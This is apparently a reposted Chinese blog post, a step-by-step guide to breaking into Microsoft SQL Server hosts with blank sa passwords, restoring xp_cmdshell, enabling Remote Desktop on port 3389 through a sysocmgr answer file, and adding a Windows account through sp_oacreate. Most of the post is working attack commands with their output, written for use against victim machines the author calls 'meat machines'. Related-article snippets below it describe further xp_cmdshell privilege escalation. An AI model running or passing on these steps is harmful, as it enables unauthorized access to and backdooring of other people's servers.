mysql xpcmd_SQL入侵恢复XP_CMDSHLL与开3389

最新推荐文章于 2023-07-06 15:45:54 发布
最新推荐文章于 2023-07-06 15:45:54 发布
阅读量213 收藏
点赞数
文章标签: mysql xpcmd
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29956903/article/details/113218178
版权

一,用SQL连接器恢复XP_CMDSHLLE的命令

(1)sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入

sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

去除

sp_dropextendedproc 'xp_cmdshell'

(3)MSSQL2000

sp_addextendedproc 'xp_cmdshell','xplog70.dll'

修改sa密码 sp_password @old = null, @new = 'complexpwd', @loginame ='sa'

这个很简单,自己堵后门用:)

二,在可以运行XP_CMDSHELL的机器上直接开3389不需要上传的

连接到主机:202.xxx.xxx.xxx //大家可以用sql连接器连上有空口令的sql肉机

命令:xp_cmdshell "type c:\boot.ini" // 输入命令,看系统,server版的才能 开3389

执行成功,结果:

[boot loader]

timeout=30

default=multi(0)disk(0)rdisk(0)partition(1)\WINNT

[operating systems]

multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect

multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect

命令:xp_cmdshell "echo [Components] > c:\duguxike" //在c盘根目录建写入一个文件,文件名duguxike大家可以自己改为自己的

执行成功,结果:

命令:xp_cmdshell "echo TsEnable = on >> c:\duguxike" //追加写入

执行成功,结果:

命令:xp_cmdshell "type c:\duguxike" //看看duguxike里的内容是否正确

执行成功,结果:

[Components]

TsEnable = on

TsEnable = on

命令:xp_cmdshell "sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\duguxike /q" //开3389,成功的话过会肉机会重启!!

执行成功,结果:

GetLocalManagedApplications returned (2)

之后就看大家的了,不过要记得册除新建的duguxike文件哦!!

三,不需要XP_CMDSHLL直接添加系统帐号,对XPLOG70.DLL被删很有效

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user gchn aaa /add'--

第一条恢复如果XPCMDSHLL被删了

第二条可以执行XPCMDSHELL但是无法利用差异备分来上传的情况下使用(本人WIN2000下测试成功)

第三条XPLOG70.DLL被删除的情况下直接添加帐号前提对方了开了3389 139 23

但是我现在无法在XPLOG70.DLL被删而且没有开3389的机器上拿到系统权限

哪为高人来指点一下!

art Scien
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql xpcmdshell_SQL入侵恢复xp_cmdshell方法总结
weixin_36256447的博客
01-19 615
恢复xp_cmdshell SQL Server阻止了对组件 'xp_cmdshell' 的过程'sys.xp_cmdshell' 启用1433 SQL入侵恢复xp_cmdshell方法总结sql server 2005下xp_cmdshell的办法EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configur...
SQL语句直接3389
weixin_33912445的博客
08-14 269
其实就是利用MSSQL的存储过程xp_regwrite 。大家在渗透MSSQL服务器的时候,苦于无法上传3389工具和3389工具不免杀时,可以使用此招轻松33893389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections 其 中键值DenyTSCo...
mysql 3389_SQL语句直接3389
weixin_39797912的博客
01-27 293
其实就是利用MSSQL的存储过程xp_regwrite 。大家在渗透MSSQL服务器的时候,苦于无法上传3389工具和3389工具不免杀时,可以使用此招轻松33893389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections其 中键值DenyTSConne...
直接用SQL连接器3389
Smile、2011、
12-28 251
一、用SQL连接器恢复XP_CMDSHLLE的命令 (1)SQL Query Analyzersp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入sp_addextendedproc 'xp_cmdshell','xpsql70.dll'去除sp...
xp系统电脑服务器端口,XP的电脑用CMD指令怎么3389端口
weixin_31524201的博客
08-05 546
输入命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f如果用CMD命令不好用,则可以试试另一种解决办法。启的REG文件代码如下:Windows Registry Editor Version 5.00[HKEY_LOCA...
MySQL.rar_chm_mySql chm_sql_sql .chm_sql chm
09-24
mySql.chm”很可能包含了MySQL的详细信息,包括安装与配置、数据库管理、表结构设计、数据类型、SQL语句的使用、索引、视图、存储过程、触发器、事务处理、备份与恢复、性能优化等众多内容。对于初学者来说,这是...
sql.rar_MYSQL_MYSQL ppt_sql 练习
09-14
这个"sql.rar_MYSQL_MYSQL ppt_sql 练习"压缩包显然包含了关于MySQL的详细教程和练习材料,旨在帮助用户深入理解和熟练掌握MySQL的相关技能。 首先,"MYSQL数据库的介绍"部分可能涵盖MySQL的基本概念,比如什么是...
mysql_cn_sc.rar_mysql 中文_mysql手册_sql mysql
09-14
手册通常包含了MySQL的安装、配置、使用方法、SQL语法、存储引擎、触发器、视图、索引、事务处理、备份与恢复、性能优化等全面的内容。 在SQL部分,你可以了解到如何使用SQL语言来操作MySQL数据库,包括数据的插入...
微软数据库发梦工场多媒体教学-MYSQL.rar_MYSQL_my sql_sql my
09-14
【标题】"微软数据库发梦工场多媒体教学-MYSQL.rar_MYSQL_my sql_sql my" 提供的信息表明,这是一个关于微软数据库发的多媒体教学资源,主要聚焦于MySQL数据库系统。MySQL是一种广泛使用的源关系型数据库管理...
MySQL.rar_linux mysql_linux sql
09-21
MySQL是一个广受Linux社区人们喜爱的半商业的数据库。MySQL是可运行在大多数的Linux平台(i386,Sparc,etc),以及少许非Linux甚至非Unix平台。MySQL的普及很大程度上源于它的宽松,除了略显不寻常的许可费用。
Cmd3389
weixin_34235371的博客
01-12 602
1、2000系统 简要说一下如何进行DNS溢出***。我用的溢出利用程序是dns.exe,在CMD下运行它可以看到它的使用参数等信息。执行"dns -s IP"命令检测目标IP是否存在DNS溢出漏洞,如图1。在图中我们可以看出目标主机存在DNS溢出漏洞,操作系统为Windows 2000!接着我们进行溢出***,执行"dns -t 2000all IP 1207"后提示...
mysql 3389_服务器安全:SSL加密3389远程桌面连(3)
weixin_35997054的博客
02-07 371
一、服务器远程桌面设置:默认情况下远程桌面功能是不支持SSL加密认证的,即使我们申请并安装了证书。第一步:通过任务栏的“始->程序->管理工具->终端服务配置”来启动tscc终端服务配置窗口。(如图1) 图1 点击看大图第二步:在tscc终端服务配置窗口中我们点“终端服衽渲?>连接”,在右边窗口中会显示出终端服务,我们在其上点鼠标右键选择“属性”。(...
MSSQL注入利用xp_cmdshell执行命令(细)
墨痕诉清风的博客
04-28 1798
MySQL不同,MSSQL提供了,它允许我们执行系统命令在xp_cmdshell中,大多数时候我们都有特权使用cmd,最重要的是,使用powershell。现在,我们将在powershell中使用curl将命令输出发送到我们的受控服务器。
数据库提权,Mssql xp_cmdshell提权
最新发布
luSaMa的博客
07-06 2116
针对Mssql xp_cmdshell提权的学习实践,SQL Server2008/2012及以前版本基本都能用,但是2016或更高版本部分不能用,或者SA权限太低,导致无法提权。数据库提权的方式也不止有Mssql xp_cmdshell一种,之后更多的提权方式也是我更应该学习的地方。
数据库提权-mssql通过xp_cmdshell提权
cxrpty的博客
03-12 4529
实验思路:1.MSSQL在Windows server类的操作系统上,默认具有system权限。System权限在Windows server2003中权限仅比 管理员小;而在2003以上的版本,则为最高权限。 ⭐ 2.获取webshell之后可尝试在服务器各个站点的目录寻找sa的密码(某些站点直接在web应用程序中使用sa连...
mysql xp cmdshell_[置顶] LOAD语句:利用MSSQL中的xp_cmdshell功能,将指定文件夹下的指定文件,生成mysql的LOAD语句...
weixin_28898707的博客
01-27 83
LOAD语句:利用MSSQL中的xp_cmdshell功能,将指定文件夹下的指定文件,生成mysql的LOAD语句declare @sql varchar(4000),@dirpath varchar(1024),@file_type varchar(16),@target_table varchar(256);select @target_table = '`AdConversions`.`Ap...
内网渗透之——mssql数据库提权之——xp_cmdshell执行系统命令
wsnbbz的博客
03-12 5686
条件 所谓利用数据进行提权,利用的其实是数据库的运行权限,所以只要我们满足以下条件即可进行提权: 1、 必须获得sa的账号密码或者与sa相同权限的账号密码,且mssql没有被降权。 2、 必须可以以某种方式执行sql语句,例如:webshell或者是1433端口的连接。 提权基本思路过程与原理 1.MSSQL在Windows server类的操作系统上,默认具有system权限。System...
内网渗透系列之域渗透深入弹shell3389拿域控
Waldocsdn的博客
03-12 1690
仅作为实验参考,不属于任何技术文章 2019年本文已首发于i春秋 实验目的:拿下一号机shell3389远程登录 拓扑图 A组 1号 账号:Administrator 密码:Jack@!@# ip:192.168.141.111 2号 账号:ADMIN-PC/ADMIN 密码:123456hhhh. 222.18.158.244:7771 ip:192.168.141.138 3号 域名:hi...
恢复xp_cmdshell
php|nginx|python|vue|redis|linux
03-13 1693
 用这些命令恢复一下xp_cmdshellcmdshellSQL语句EXEC sp_addextendedproc xp_cmdshell ,@dllname =xplog70.dll判断存储扩展是否存在Select count(*) from master.dbo.sysobjects where xtype=X and name=xp_cmdsh
sqlmysql数据对接_SQL Server 对接MySQL 数据库
05-24
SQL Server 对接 MySQL 数据库可以通过以下几种方式实现: 1. 使用ODBC驱动程序:ODBC是一种放的数据库连接标准...总之,SQL Server与MySQL之间的数据对接可以通过多种方式实现,具体的方法取决于具体的需求和场景。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值